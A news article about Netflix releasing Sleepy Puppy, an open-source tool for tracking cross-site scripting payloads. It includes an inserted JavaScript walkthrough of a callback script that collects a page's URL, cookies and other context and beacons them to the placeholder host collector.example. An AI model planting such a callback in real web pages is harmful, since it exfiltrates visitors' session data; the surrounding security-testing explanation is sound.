Netflix releases Sleepy Puppy anti-XSS tool

Helps devs tackle common yet dangerous security problem.

Video streaming giant Netflix has open-sourced its customisable Sleepy Puppy anti-cross-site scripting tool to help developers find and fix the vulnerability in their web applications.

Sleepy Puppy. Source: Netflix.

Cross-site scripting (XSS) is a common security problem for website developers. It allows attackers to inject scripts that run in other visitors' web browsers in the context of the vulnerable site, and it has featured in the Open Web Application Security Project (OWASP) Top Ten list of web vulnerabilities for more than a decade.

Netflix engineers Scott Behrens and Patrick Kelley said that while there were existing tools to ferret out XSS holes in web apps, the company wanted a more comprehensive security framework to simplify cross-site scripting payload propagation and identification, that is, tracking where an injected payload ends up and when it fires, so as to allow developers to fix issues faster.

Netflix Sleepy Puppy testing workflow diagram.

The anti-XSS tool lets testers create payloads and PuppyScripts, the callback scripts that collect data when a payload is executed, along with screenshots and metadata about each event.
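To make the payload-and-callback model concrete, the following is an added example of the round trip a tool of this kind relies on; it is not Sleepy Puppy's own PuppyScript or server code. The browser-side function gathers context when a stored payload finally fires, encodes it into a beacon URL, and the collector side validates the callback against the payload IDs the tester registered and escapes the captured data before rendering it. The collector URL, payload ID and the window/document objects are constructed for the walkthrough so it runs under Node without a browser.

```javascript
// Added example, not code from the Sleepy Puppy project. Names, URLs and the
// constructed window/document below are illustrative assumptions.

// Constructed stand-ins for the browser globals a callback script would read.
const SAMPLE_WINDOW = {
  location: { href: "https://admin.internal.example/tickets/42" },
  navigator: { userAgent: "Mozilla/5.0 (constructed sample)" },
};
const SAMPLE_DOCUMENT = {
  referrer: "https://admin.internal.example/tickets",
  // document.cookie never exposes HttpOnly cookies; whatever it does expose
  // is worth recording, because a missing HttpOnly flag is its own finding.
  cookie: "session=abc123",
  documentElement: { outerHTML: "<html><body><p>ticket 42</p></body></html>" },
};

// Browser side: what a callback script does when the injected payload runs.
// win/doc/now are parameters so the same code runs against constructed
// objects here and against the real globals inside a page.
function collectContext(payloadId, win, doc, now = new Date()) {
  return {
    id: payloadId,
    url: win.location.href,
    referrer: doc.referrer || "",
    cookies: doc.cookie || "",
    domLength: doc.documentElement.outerHTML.length,
    ua: win.navigator.userAgent,
    firedAt: now.toISOString(),
  };
}

// Encode the context into a GET beacon (in a page this would be loaded via
// `new Image().src = url`). GET URLs get truncated by browsers at a few KB,
// so full DOM snapshots and screenshots should go over POST instead.
function buildBeaconUrl(collectorBase, ctx) {
  const u = new URL(collectorBase);
  for (const [k, v] of Object.entries(ctx)) u.searchParams.set(k, String(v));
  return u.toString();
}

// Collector side: accept only IDs the tester actually generated, so random
// scanner noise hitting the endpoint is not logged as a hit, and cap field
// sizes so one callback cannot bloat the store.
const MAX_FIELD = 2048;
function parseBeacon(urlString, registeredIds) {
  const p = new URL(urlString).searchParams;
  const id = p.get("id");
  if (!id || !registeredIds.has(id)) return null;
  const clip = (s) => (s || "").slice(0, MAX_FIELD);
  return {
    id,
    url: clip(p.get("url")),
    referrer: clip(p.get("referrer")),
    cookies: clip(p.get("cookies")),
    domLength: Number(p.get("domLength")) || 0,
    ua: clip(p.get("ua")),
    firedAt: clip(p.get("firedAt")),
  };
}

// Captured URLs, referrers and user agents come from pages and users outside
// the tester's control, so the dashboard that shows them is itself an XSS
// sink and must escape everything it renders.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderRow(ev) {
  return `<tr><td>${escapeHtml(ev.id)}</td><td>${escapeHtml(ev.url)}</td>` +
         `<td>${escapeHtml(ev.referrer)}</td><td>${ev.domLength}</td></tr>`;
}

// Full walkthrough: payload fires in the constructed page, beacons home, and
// the collector records the event. Returns the stored event.
function runRoundTrip() {
  const registered = new Set(["pp-0001"]); // IDs the tester generated
  const ctx = collectContext("pp-0001", SAMPLE_WINDOW, SAMPLE_DOCUMENT,
                             new Date("2015-08-19T10:00:00Z"));
  const beacon = buildBeaconUrl("https://collector.example/cb", ctx);
  return parseBeacon(beacon, registered);
}
```

Running this against a real target only makes sense inside an authorised assessment, since the callback deliberately exfiltrates whatever context the victim page exposes; the registered-ID check and the output escaping are the two pieces most often missing from home-grown collectors.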

Sleepy Puppy was released as open source on GitHub. It requires Python 2.7 with Flask and helper packages, SQLAlchemy with a configurable storage backend, the Ace JavaScript editor, and the html2canvas JavaScript library for screenshots, which can be stored in Amazon S3 cloud storage.

Notifications can be set up via Amazon Web Services' Simple Email Service (SES).

Netflix, a large developer and user of open source software, has released several tools to the community over past years.

Just over a year ago, the company open sourced the Scumblr and Sketchy security scanning tools, and prior to that, the Security Monkey configuration monitoring and analysis tool for Amazon Web Services, which hosts Netflix around the world.

Copyright © iTnews.com.au . All rights reserved.